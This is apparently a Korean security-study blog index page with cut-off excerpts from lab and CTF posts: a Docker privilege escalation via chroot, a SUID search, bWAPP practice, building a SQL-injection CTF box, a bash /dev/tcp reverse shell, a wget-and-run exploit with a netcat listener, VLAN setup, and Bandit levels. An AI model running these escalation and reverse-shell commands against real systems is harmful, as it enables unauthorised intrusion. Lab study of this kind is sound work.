MIN

docker privileges escalation 검색 (GTFOBins 홈페이지 참조) # 도커 컨테이너를 이용해 사용자 컴퓨터의 전체 파일 시스템을 임시로 마운트하고 셸 환경을 실행docker run -v /:/mnt --rm -it alpine chroot /mnt sh 호스트 시스템의 전체 파일 시스템을 마운트한 alpine 컨테이너를 실행하고, 컨테이너 내부에서 chroot 명령어로 호스트의 루트로 환경을 바꾼 후, 셸(sh)을 실행한다. 이를 통해 컨테이너 안에서 호스트 시스템에 대한 관리 작업을 수행할 수 있게 된다.

# 루트 디렉터리부터 시작하여 소유자가 root이고 SUID 권한이 설정된 일반 파일을 모두 찾기find / -user root -perm /4000 -file f

300번대 리다이렉션 메세지400번대500번대 서버 에러 응답

linux - ubuntu - beebox 디스크 지정 후 설치 Beebox보안 취약점 실습을 위해 의도적으로 취약하게 만들어진 가상 운영체제 SQL 인젝션, XSS, 파일 업로드 등 다양한 웹 취약점들이 미리 포함된 bWAPP이라는 애플리케이션이 설치되어 있어, 공격과 방어 방법을 직접 연습할 수 있다. bWAPP v2.2 bug Hack Practice Beebox : 192.168.16.30Kali : 192.168.16.97 에서 진행A1 - Injection 1. HTML Injection - Reflected (GET) 2. HTML Injection - Reflected (POST) 3. HTML Injection - Reflected (Current URL) 4. HTM..

CTF Box's name : Pyramid 피라미드의 수수께끼를 풀고 숨겨진 보물(root_flag)을 찾는것이 목표 적용할 기법 : SQL Injection: DB에 비정상적인 구문을 입력하여 secret_info 의 존재를 확인하고 조회해서 다음단계로 가는 key 값 획득 CTF 제작 로드맵1. 메인 PHP 웹페이지 제작2. DB 구축 및 레코드 삽입3. 웹 페이지와 DB 연결4. SQL Injection 공격이 가능하도록 취약점 만들기 (php 페이지 수정)5. 공격가능한 SQL 구문 작성 및 페이로드 확인6. 의도했던 취약점 외 다른 취약점은 없는지 진단 및 조치 메인 페이지 이름 : 파라오 아카이브(Pharaoh Archives)역대 이집트의 고대 왕들에 대한 정보를 검색할 수 ..

Fuzzing : 파라미터 네임 무작위 대입 공격 다음 명령어를 사용하여 리버스 쉘을 생성 (Kali에서는 7777번 포트 리스닝)bash -c 'bash -i >& /dev/tcp/192.168.16.57/7777 0>&1' 하지만 이 코드 그대로 URL에 대입하면 접속되지않아서 URL로 인코딩하여 대입하기로 함 curl -si -u '' sftp://192.168.5.119/test -k 이 명령어는 SFTP 서버의 인증 과정 취약점을 이용해 PHP 코드를 업로드하는 시도입니다.curl -si: curl은 URL을 통해 데이터를 전송하는 도구입니다. -s는 진행 표시줄 등을 숨겨 조용히 실행하도록 하고, -i는 HTTP 응답 헤더를 포함하여 보여줍니다.-u '': -u는 사용자 ..

There is a need to transfer this exploit so, launch the Python server with the following command:python -m SimpleHTTPServer 80Let’s start the Netcat listener on new port 8888.nc -lvp 8888Now, download the created exploit using “wget” in the tmp foldercd /tmpwget http://192.168.1.3/poc.pyOnce it is downloaded, now run the exploit with the following command:python3 poc.pyCapture the root flagWe re..

1단계: VLAN 생성 및 이름 지정모든 스위치(ESW1, ESW2, ESW3)에서 다음 명령어를 실행하여 VLAN을 생성하고 이름을 지정합니다. 2단계: 스위치 포트에 VLAN 할당각 스위치에 연결된 VPC와 스위치 간의 링크, 그리고 라우터에 연결된 포트에 적절한 VLAN을 할당합니다. 3단계: R1 라우터 설정 (Router-on-a-Stick)라우터(R1)에서 Router-on-a-Stick 설정을 통해 VLAN 간 통신을 위한 게이트웨이를 구성합니다. 이 단계는 이전과 동일하며, 각 VLAN에 맞는 서브 인터페이스를 생성하는 것이 핵심입니다. 라우터의 서브 인터페이스 설정을 제거하면, VLAN은 완벽하게 분리된 네트워크가 되어 같은 VLAN에 속한 장비들끼리만 통신이 가능하게 됩니다. 4..

Bandit17 diff [옵션] : 파일1과 파일2를 비교하여 차이점을 표준 출력으로 보여준다. cmp명령어는 두 파일을 바이트 단위로 비교하여 차이점을 찾아내는 데 사용됩니다. diff명령어가 줄 단위로 내용을 비교하는 반면, cmp는 이진(binary) 파일까지도 비교할 수 있어 더 원시적인 차이를 감지하는 데 적합 Bandit18 Bandit19 → 홈 디렉터리에 있는 setuid 바이너리를 사용해야 합니다. 사용법을 알아내기 위해 인수(argument) 없이 실행하세요. setuid 바이너리를 사용한 후에는 평소처럼 /etc/bandit_pass 에서 이 레벨의 비밀번호를 찾을 수 있습니다 ls -l 명령어를 사용하여 현재 디렉터리의 파일을 자세히 살펴보면 bandi..